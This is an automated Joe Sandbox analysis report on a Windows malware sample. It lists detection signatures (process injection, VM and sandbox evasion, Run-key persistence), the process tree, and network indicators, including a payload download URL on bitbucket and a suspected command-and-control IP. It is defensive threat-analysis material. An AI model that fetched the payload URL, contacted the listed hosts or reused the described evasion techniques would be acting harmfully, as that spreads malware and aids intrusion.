Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3XSXmrEOw7.exe

Overview

General Information

Sample name:3XSXmrEOw7.exe
renamed because original name is a hash value
Original sample name:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Analysis ID:1573895
MD5:ddce3b9704d1e4236548b1a458317dd0
SHA1:a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Drops large PE files
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3XSXmrEOw7.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\3XSXmrEOw7.exe" MD5: DDCE3B9704D1E4236548B1A458317DD0)
    • csc.exe (PID: 5980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: csc.exe PID: 5980JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          SourceRuleDescriptionAuthorStrings
          3.2.csc.exe.9540000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            3.2.csc.exe.7ef6e08.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3XSXmrEOw7.exe, ProcessId: 7812, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 3XSXmrEOw7.exeAvira: detected
              Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49768 version: TLS 1.2
              Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.1598027769.0000000007F6D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30
              Source: global trafficTCP traffic: 192.168.2.10:49762 -> 181.131.217.244:30203
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
              Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: csc.exe, 00000003.00000002.3786417817.0000000007077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
              Source: csc.exe, 00000003.00000002.3789805471.000000000986D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsX
              Source: csc.exe, 00000003.00000002.3786417817.0000000007077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
              Source: csc.exe, 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.000000000707E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 3XSXmrEOw7.exeString found in binary or memory: http://www.microsoft.c
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
              Source: csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000006D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
              Source: csc.exe, 00000003.00000002.3786417817.000000000701D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: csc.exe, 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: csc.exe, 00000003.00000002.3786417817.0000000007058000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007054000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3786417817.0000000007038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49768 version: TLS 1.2

              System Summary

              barindex
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.csLarge array initialization: IterateAdaptableIterator: array initializer size 543744
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile dump: ElectronArtsCLI.exe.0.dr 979567344Jump to dropped file
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080600_2_00408060
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004088120_2_00408812
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080200_2_00408020
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040983B0_2_0040983B
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004070E00_2_004070E0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004058F30_2_004058F3
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080FE0_2_004080FE
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080980_2_00408098
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004080A50_2_004080A5
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071520_2_00407152
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071660_2_00407166
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041E1000_2_0041E100
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004059050_2_00405905
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081060_2_00408106
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040711D0_2_0040711D
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040591E0_2_0040591E
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081240_2_00408124
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004059250_2_00405925
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004071250_2_00407125
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040813A0_2_0040813A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004081D00_2_004081D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004069A70_2_004069A7
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004091B90_2_004091B9
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004242500_2_00424250
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407A060_2_00407A06
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040720A0_2_0040720A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00408AE80_2_00408AE8
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004082F30_2_004082F3
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083770_2_00408377
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406BD30_2_00406BD3
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083ED0_2_004083ED
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004083BB0_2_004083BB
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C5E0_2_00407C5E
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406C1B0_2_00406C1B
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C350_2_00407C35
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407C3A0_2_00407C3A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004084DF0_2_004084DF
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406CE60_2_00406CE6
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407CE70_2_00407CE7
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004084F40_2_004084F4
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004074F50_2_004074F5
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406C960_2_00406C96
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406D400_2_00406D40
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407D5C0_2_00407D5C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407D7C0_2_00407D7C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075000_2_00407500
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406D1C0_2_00406D1C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075C00_2_004075C0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004095CC0_2_004095CC
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075E00_2_004075E0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075F00_2_004075F0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004075F80_2_004075F8
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004065990_2_00406599
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E400_2_00406E40
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E500_2_00406E50
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004076520_2_00407652
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415E700_2_00415E70
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00429E1C0_2_00429E1C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406E300_2_00406E30
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EA00_2_00406EA0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EA90_2_00406EA9
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406EB70_2_00406EB7
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00407F650_2_00407F65
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F0B0_2_00406F0B
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F1B0_2_00406F1B
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F2C0_2_00406F2C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097300_2_00409730
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406FD00_2_00406FD0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097DD0_2_004097DD
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004087E00_2_004087E0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004097EE0_2_004097EE
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00406F960_2_00406F96
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F26BC03_2_04F26BC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F215603_2_04F21560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F2154F3_2_04F2154F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F242F03_2_04F242F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21C283_2_04F21C28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21C0B3_2_04F21C0B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F23D243_2_04F23D24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21BF03_2_04F21BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21BC73_2_04F21BC7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F26BB03_2_04F26BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21B8F3_2_04F21B8F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_04F21B7A3_2_04F21B7A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09486BA03_2_09486BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09481C883_2_09481C88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09489FF53_2_09489FF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09484E783_2_09484E78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094800403_2_09480040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094842603_2_09484260
